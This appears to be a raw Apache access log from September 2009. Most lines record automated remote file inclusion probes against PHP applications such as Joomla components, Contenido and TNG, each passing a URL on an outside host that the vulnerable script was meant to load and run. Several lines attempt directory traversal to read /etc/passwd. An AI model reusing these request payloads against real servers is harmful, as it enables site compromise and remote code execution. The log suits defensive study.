59.24.49.35 - - [11/Sep/2009:10:15:50 -0500] "GET /logs/access_log.1235174400//components/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.230.164 - - [11/Sep/2009:10:22:45 -0500] "GET /logs/access_log.1241481600 HTTP/1.1" 200 511899 "-""Mozilla/4.0"
222.236.47.182 - - [11/Sep/2009:10:25:10 -0500] "GET //administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:25:10 -0500] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:25:10 -0500] "GET /logs/access_log.1241222400//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:25:10 -0500] "GET /logs/access_log.1239580800//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
65.55.230.164 - - [11/Sep/2009:10:25:19 -0500] "GET /logs/access_log.1245024000 HTTP/1.1" 200 567842 "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:10:25:22 -0500] "GET /logs/access_log.1247097600 HTTP/1.1" 200 829750 "-""Mozilla/4.0"
222.236.47.182 - - [11/Sep/2009:10:26:20 -0500] "GET //administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:26:20 -0500] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:26:20 -0500] "GET /logs/access_log.1241222400//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:26:20 -0500] "GET /logs/access_log.1239580800//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:10:26:37 -0500] "GET /logs/access_log.1243555200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:10:26:37 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:10:26:37 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:10:27:45 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jonrothbard.com/one.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
125.251.105.194 - - [11/Sep/2009:10:27:51 -0500] "GET /become_editor.php?theme_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 300 "-""Mozilla/5.0"
125.251.105.194 - - [11/Sep/2009:10:27:52 -0500] "GET /logs/become_editor.php?theme_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
125.251.105.194 - - [11/Sep/2009:10:27:52 -0500] "GET /logs/access_log.1245715200/become_editor.php?theme_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
125.251.105.194 - - [11/Sep/2009:10:28:26 -0500] "GET /logs/access_log.1238112000/become_editor.php?theme_path=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 327 "-""Mozilla/5.0"
91.202.4.158 - - [11/Sep/2009:10:30:25 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-""-"
91.202.4.158 - - [11/Sep/2009:10:30:25 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""-"
91.202.4.158 - - [11/Sep/2009:10:30:26 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=./../../../../../../../../etc/passwd HTTP/1.1" 404 327 "-""-"
91.202.4.158 - - [11/Sep/2009:10:30:26 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=./../../../../../../../../etc/passwd HTTP/1.1" 404 332 "-""-"
70.90.108.169 - - [11/Sep/2009:10:33:08 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:10:33:08 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:10:33:08 -0500] "GET /logs/access_log.1244160000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:10:33:08 -0500] "GET /logs/access_log.1247184000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:33:20 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
204.15.230.189 - - [11/Sep/2009:10:33:21 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
92.50.143.90 - - [11/Sep/2009:10:33:40 -0500] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
92.50.143.90 - - [11/Sep/2009:10:33:40 -0500] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
92.50.143.90 - - [11/Sep/2009:10:33:40 -0500] "GET /logs/access_log.1243728000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:33:40 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
204.15.230.189 - - [11/Sep/2009:10:33:40 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
204.15.230.189 - - [11/Sep/2009:10:33:41 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
204.15.230.189 - - [11/Sep/2009:10:33:41 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
92.50.143.90 - - [11/Sep/2009:10:33:49 -0500] "GET /logs/access_log.1245628800//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:34:23 -0500] "GET /logs/access_log.1237334400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
204.15.230.189 - - [11/Sep/2009:10:34:23 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2688053_k2pvt/id2.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
58.184.252.3 - - [11/Sep/2009:10:34:40 -0500] "GET /logs/access_log.1240531200//include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
58.184.252.3 - - [11/Sep/2009:10:34:40 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
114.4.8.14 - - [11/Sep/2009:10:34:46 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
114.4.8.14 - - [11/Sep/2009:10:34:46 -0500] "GET /logs/access_log.1240531200//include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
114.4.8.14 - - [11/Sep/2009:10:35:13 -0500] "GET /logs/access_log.1245369600//include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:35:44 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:35:44 -0500] "GET /logs/access_log.1244764800//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:35:44 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:35:57 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:35:57 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.64.84.44 - - [11/Sep/2009:10:36:10 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
69.64.84.44 - - [11/Sep/2009:10:36:10 -0500] "GET /logs/access_log.1237334400///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.64.84.44 - - [11/Sep/2009:10:36:10 -0500] "GET /logs/access_log.1250985600///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.64.84.44 - - [11/Sep/2009:10:36:11 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 204584 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:36:25 -0500] "GET /logs/access_log.1244764800//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:36:46 -0500] "GET /logs/access_log.1237334400///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:36:46 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:36:46 -0500] "GET /logs/access_log.1250985600///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:36:47 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 204584 "-""Mozilla/5.0"
58.184.252.3 - - [11/Sep/2009:10:36:56 -0500] "GET /logs/access_log.1245369600//include/mail.inc.php?skin_board_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:37:28 -0500] "GET /logs/access_log.1236038400///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.251.105.194 - - [11/Sep/2009:10:37:28 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
125.251.105.194 - - [11/Sep/2009:10:37:29 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
125.251.105.194 - - [11/Sep/2009:10:37:29 -0500] "GET /logs/access_log.1250985600/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
125.251.105.194 - - [11/Sep/2009:10:37:46 -0500] "GET /logs/access_log.1238112000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:37:54 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:37:54 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:37:54 -0500] "GET /logs/access_log.1237334400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:10:37:55 -0500] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:10:37:55 -0500] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:10:37:55 -0500] "GET /logs/access_log.1244764800//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 366 "-""Mozilla/5.0"
204.15.230.189 - - [11/Sep/2009:10:37:58 -0500] "GET /logs/access_log.1250985600/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.232.104.221 - - [11/Sep/2009:10:38:59 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
218.232.104.221 - - [11/Sep/2009:10:38:59 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
218.232.104.221 - - [11/Sep/2009:10:38:59 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:39:42 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:39:42 -0500] "GET /logs/access_log.1244764800//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:39:42 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:42:05 -0500] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:42:05 -0500] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
219.85.63.226 - - [11/Sep/2009:10:42:05 -0500] "GET /logs/access_log.1244764800//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
91.149.157.136 - - [11/Sep/2009:10:42:12 -0500] "GET /logs/access_log.1237334400//config/dbutil.bck.php?confdir=http://www.saskatoonhomepage.ca//components/idggg.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.136 - - [11/Sep/2009:10:42:12 -0500] "GET //config/dbutil.bck.php?confdir=http://www.saskatoonhomepage.ca//components/idggg.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.149.157.136 - - [11/Sep/2009:10:42:13 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.saskatoonhomepage.ca//components/idggg.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
222.236.47.182 - - [11/Sep/2009:10:42:16 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:42:16 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:42:16 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:42:24 -0500] "GET //kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:42:24 -0500] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:42:24 -0500] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
94.23.197.26 - - [11/Sep/2009:10:43:09 -0500] "GET /logs/index2.php?content=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
94.23.197.26 - - [11/Sep/2009:10:43:09 -0500] "GET /logs/access_log.1243728000/index2.php?content=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
94.23.197.26 - - [11/Sep/2009:10:43:10 -0500] "GET /index2.php?content=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
94.23.197.26 - - [11/Sep/2009:10:43:10 -0500] "GET /logs/access_log.1245628800/index2.php?content=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
94.23.197.26 - - [11/Sep/2009:10:43:19 -0500] "GET /logs/access_log.1243036800/index2.php?content=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 320 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
94.23.197.26 - - [11/Sep/2009:10:43:19 -0500] "GET /logs/index2.php?content=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 298 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
94.23.197.26 - - [11/Sep/2009:10:43:19 -0500] "GET /index2.php?content=http://tmsabogados.com.ar/img/back.gif??? HTTP/1.1" 404 293 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
65.55.208.136 - - [11/Sep/2009:10:46:50 -0500] "GET /logs/access_log.1248307200 HTTP/1.1" 200 714056 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [11/Sep/2009:10:48:51 -0500] "GET //include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:48:51 -0500] "GET /logs//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:48:51 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:48:52 -0500] "GET /logs//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:48:52 -0500] "GET //include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:48:52 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:48:52 -0500] "GET /logs//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:48:53 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
218.38.136.251 - - [11/Sep/2009:10:48:53 -0500] "GET //include/write.php?dir=http://akbotong.com/akboshop/UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
65.55.207.133 - - [11/Sep/2009:10:49:08 -0500] "GET /logs/access_log.1130025600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.232.104.221 - - [11/Sep/2009:10:49:34 -0500] "GET /logs/access_log.1237334400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.232.104.221 - - [11/Sep/2009:10:49:45 -0500] "GET /logs/access_log.1250985600/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.hotlinkfiles.com/files/2792220_datae/fx29id2.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:54:09 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [11/Sep/2009:10:54:16 -0500] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.55.207.122 - - [11/Sep/2009:10:55:07 -0500] "GET /logs/access_log.1247097600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.22.26.195 - - [11/Sep/2009:10:55:48 -0500] "GET //include/write.php?dir=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:10:55:48 -0500] "GET /logs/access_log.1244764800//include/write.php?dir=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:10:55:48 -0500] "GET /logs//include/write.php?dir=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:10:56:03 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:10:56:36 -0500] "GET //include/write.php?dir=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:10:56:36 -0500] "GET /logs//include/write.php?dir=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:10:56:36 -0500] "GET /logs/access_log.1244764800//include/write.php?dir=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:10:56:47 -0500] "GET /logs/access_log.1237075200//include/write.php?dir=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:11:00:01 -0500] "GET //components/com_flyspray/startdown.php?file=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.22.26.195 - - [11/Sep/2009:11:00:02 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://wondho.fileave.com/zfxid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
